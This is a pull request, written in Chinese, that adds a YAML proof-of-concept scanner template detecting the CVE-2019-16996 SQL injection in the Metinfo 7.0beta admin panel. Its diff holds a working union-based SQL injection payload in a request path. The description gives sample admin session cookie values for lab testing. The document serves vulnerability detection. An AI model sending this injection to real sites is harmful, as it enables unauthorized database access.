### PR TITLE
添加Metinfo7.0beta后台SQL注入漏洞POC(cve-2019-16996)

### DIFF
--- a/pocs/metinfo-cve-2019-16996-sqli.yml
+++ b/pocs/metinfo-cve-2019-16996-sqli.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-metinfo-cve-2019-16996-sqli
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: GET
+    path: >-
+      /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23
+    follow_redirects: true
+    expression: |
+      status==200 && body.bcontains(bytes(string(r1*r2)))
+detail:
+  author: JingLing(https://hackfun.org/)
+  metinfo_version: 7.0.0beta
+  links:
+    - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
检测Metinfo7.0beta后台SQL注入漏洞(cve-2019-16996)
## 测试环境
下载安装即可：https://u.mituo.cn/api/metinfo/download/7.0.0beta
## 备注
由于是漏洞只能在后台触发，测试时在config.yaml http节cookies添加类似以下键值，至少需要met_auth和met_key键值。
```yaml
http:
  ...
  cookies: # 每个请求预置的 cookie 值，效果上相当于添加了一个 Header: Cookie: key=value
    met_auth: 8a86lVyRH0ZAjHOQo8rukMv62ItWO1c%2FGKFjJelpRV3r58cBubkUoxpjTLrvct1T6YG7HN%2ByMmaZFMdDWstUvBZH
    met_key: RCVQcCW
```
本地测试截图：
![image](https://user-images.githubusercontent.com/24275308/66728249-4c969780-ee76-11e9-9d74-71fadfb6d25f.png)
